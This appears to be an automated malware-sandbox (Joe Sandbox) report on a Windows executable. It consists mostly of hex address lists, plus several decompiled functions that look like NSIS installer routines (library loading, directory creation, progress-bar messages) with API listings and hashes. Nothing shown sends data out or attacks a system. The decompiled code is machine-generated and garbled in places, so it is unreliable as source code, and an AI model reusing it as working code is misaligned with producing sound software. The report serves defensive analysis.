0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x004072e6
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072ec
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000
0x00407499
0x004072e6
0x0040726d
0x0040726a

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction ID: 82756e30bcf828709d5cbcfbd5bc5585b8b9ec353a8eaca6552b8bf5b5cc12a5
Opcode Fuzzy Hash: 387721db96078c788ef05d401c52d1705cfc64557ecb0b14db2e4703a56ba408
Instruction Fuzzy Hash: 70713371E04229CBDF28CF98C844BADBBB1FB44305F14816EE856B7291C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x42a2e0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406943(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E00405569(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B56( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 6af713299b8adcbd5f00c1026be5b9682a08db544a9c6b6135e3e1e7b641de0c
Instruction ID: 94cae06f4fc191ca30d479cf411a95ccd627b95a6d871bbe988cbf7c6203fea7
Opcode Fuzzy Hash: 6af713299b8adcbd5f00c1026be5b9682a08db544a9c6b6135e3e1e7b641de0c
Instruction Fuzzy Hash: 0D21F231904104FBCF11AFA5CF48A9E7A71BF48354F20013BF501B91E0DBBD8A92965D

Uniqueness

Uniqueness Score: -1.00%

Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72
memoryCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce28; // 0x5e6f10
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E00406544(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce28; // 0x5e6f10
						 *_t34 = _t12;
						 *0x40ce28 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x5e6f14
							E00406507(_t30, _t3);
							_push(_t33);
							 *0x40ce28 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E00406507(_t32, _t33 + 4);
								_t22 =  *0x40ce28; // 0x5e6f10
								E00406507(_t36, _t22 + 4);
								_t25 =  *0x40ce28; // 0x5e6f10
								_push(_t32);
								_push(_t25 + 4);
								E00406507();
								L15:
								 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E00406544(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B67();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}

0x00401b9b
0x00401b9b
0x00401b9e
0x00401ba6
0x00401bef
0x00401c1d
0x00401c26
0x00401c28
0x00401c2c
0x00401c31
0x00401c36
0x00401c38
0x00401bf1
0x00401bf3
0x0040292e
0x00401bf9
0x00401bf9
0x00401bfe
0x00401c05
0x00401c06
0x00401c0b
0x00401c0b
0x00401bf3
0x00000000
0x00401ba8
0x00401ba8
0x00401ba8
0x00401bab
0x00000000
0x00000000
0x00401bb1
0x00401bb5
0x00000000
0x00401bb7
0x00401bb9
0x00000000
0x00401bbf
0x00401bbf
0x00401bc2
0x00401bc9
0x00401bce
0x00401bd8
0x00401bdd
0x00401be2
0x00401be6
0x00402a94
0x00402c2a
0x00402c2d
0x00402c33
0x00402c33
0x00401bb9
0x00000000
0x00401bb5
0x0040238a
0x00402397
0x00402398
0x0040239d
0x0040239d
0x00402c35
0x00402c39

APIs

GlobalFree.KERNEL32(005E6F10), ref: 00401C0B
GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D

Part of subcall function 00406544: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
Part of subcall function 00406544: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,?,004055A0,Skipped: C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll,00000000), ref: 00406743

Strings

Call, xrefs: 00401BC2, 00401BC8, 00401BE2

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Global$AllocFreelstrcatlstrlen
String ID: Call
API String ID: 3292104215-1824292864
Opcode ID: 96303e0d65c209b7bdc18db1c21159856fd8b7b791ecf41b0247c11e991d01e9
Instruction ID: e925a152a6e0f7021576dd296752ea90fe74f89098b2d6bde03e837448aacd47
Opcode Fuzzy Hash: 96303e0d65c209b7bdc18db1c21159856fd8b7b791ecf41b0247c11e991d01e9
Instruction Fuzzy Hash: BA213673904210EBD720AFA4DEC5E5E72A4EB08328715093BF552B72D1D6BCE8518B5D

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405E81(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E03(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AB5( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AD2(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A38( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406507(0x436000,  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x004022f1
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402c2d
0x00402c39

APIs

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76D23420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76D23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405A38: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B

SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
Instruction ID: 5432bfb841e0ad51ec8b230ce72dc3ef5087fba7ddd62730da8486a2a7133ac3
Opcode Fuzzy Hash: 6ff43b3191649a75527d97ac2c164a3e64988898bdda7d9265b57bfb7f9fc5be
Instruction Fuzzy Hash: 0F110331504100EBCF216FA0CD40A9F36A0EF14328B24093BF941B12F1DA3E4A829B8D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4, struct HWND__* _a10) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a10 != 0) {
						 *0x42920c =  *0x42920c + _t12;
						SendMessageW(_a10, 0x402, MulDiv( *0x42920c, 0x7530,  *0x4291f4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction ID: 40daf909c284af41af5c9cdf7f458e0296b91398e9c9917f7ae767538e8fd086
Opcode Fuzzy Hash: 970bce7bfd6110042ba11e2ba34b1580a3262637bb8a43ad7db674ac8d0d0c57
Instruction Fuzzy Hash: 1A01D131724220EBEB194B389D09B2A3698E710318F10867AF855F66F1E6788C129B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: a1ead64ad57a9f59bb533dc3fefcb6680a71f41458073c8291969f7e027d6520
Instruction ID: 5d3c5223d4adea09edd48fe2ddafa99b3fbee87e2958761c9001e4fb32d1ad87
Opcode Fuzzy Hash: a1ead64ad57a9f59bb533dc3fefcb6680a71f41458073c8291969f7e027d6520
Instruction Fuzzy Hash: C3E0D872908201CFE705EBA4EE485AE73F4EF40315710097FE401F11D1DBB54C00866D

Uniqueness

Uniqueness Score: -1.00%

Function 004068D4 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004068D4(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E00406864(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x004068dc
0x004068df
0x004068e6
0x004068ee
0x004068fa
0x00000000
0x00406901
0x004068f1
0x004068f8
0x00000000
0x00406909
0x00000000

APIs

